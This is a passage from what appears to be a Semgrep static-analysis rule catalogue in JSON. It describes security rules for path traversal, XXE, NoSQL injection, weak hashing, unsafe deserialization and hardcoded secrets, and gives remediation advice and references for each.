[https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","id":"python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","name":"python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","id":"java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","name":"java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query."},"help":{"markdown":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli)\n - [https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf)\n","text":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query."},"helpUri":"https://semgrep.dev/r/javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","id":"javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","name":"javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"help":{"markdown":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server)\n - [https://nodejs.org/api/http.html#http_class_http_agent](https://nodejs.org/api/http.html#http_class_http_agent)\n - [https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY](https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY)\n","text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","id":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","name":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered."},"help":{"markdown":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","id":"swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","name":"swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","id":"python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","name":"python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"help":{"markdown":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","id":"ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","name":"ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible."},"help":{"markdown":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.lang.xml.should-resolve-xxe.swift-xxe-prevention)\n - [https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html)\n - [https://mas.owasp.org/MASVS/controls/MASVS-CODE-4/](https://mas.owasp.org/MASVS/controls/MASVS-CODE-4/)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n","text":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible."},"helpUri":"https://semgrep.dev/r/swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","id":"swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","name":"swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: swift.lang.xml.should-resolve-xxe.swift-xxe-prevention"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`."},"help":{"markdown":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","id":"terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","name":"terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen."},"help":{"markdown":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n - [https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/](https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/)\n","text":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","id":"swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","name":"swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","properties":{"precision":"very-high","tags":["CWE-272: Least Privilege Violation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","id":"rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","name":"rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"ERC721 onERC721Received() reentrancy"},"help":{"markdown":"ERC721 onERC721Received() reentrancy\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.erc721-reentrancy.erc721-reentrancy)\n - [https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a](https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a)\n - [https://etherscan.io/address/0x14e0a1f310e2b7e321c91f58847e98b8c802f6ef](https://etherscan.io/address/0x14e0a1f310e2b7e321c91f58847e98b8c802f6ef)\n","text":"ERC721 onERC721Received() reentrancy"},"helpUri":"https://semgrep.dev/r/solidity.security.erc721-reentrancy.erc721-reentrancy","id":"solidity.security.erc721-reentrancy.erc721-reentrancy","name":"solidity.security.erc721-reentrancy.erc721-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.erc721-reentrancy.erc721-reentrancy"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\"."},"help":{"markdown":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n - [https://xerces.apache.org/xerces2-j/features.html](https://xerces.apache.org/xerces2-j/features.html)\n","text":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\"."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","id":"java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","name":"java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar."},"help":{"markdown":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host)\n - [https://nginx.org/en/docs/http/ngx_http_map_module.html](https://nginx.org/en/docs/http/ngx_http_map_module.html)\n","text":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","id":"generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","name":"generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","properties":{"precision":"very-high","tags":["CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","id":"csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","name":"csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.use-of-md5.use-of-md5)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.use-of-md5.use-of-md5","id":"kotlin.lang.security.use-of-md5.use-of-md5","name":"kotlin.lang.security.use-of-md5.use-of-md5","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.use-of-md5.use-of-md5"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep 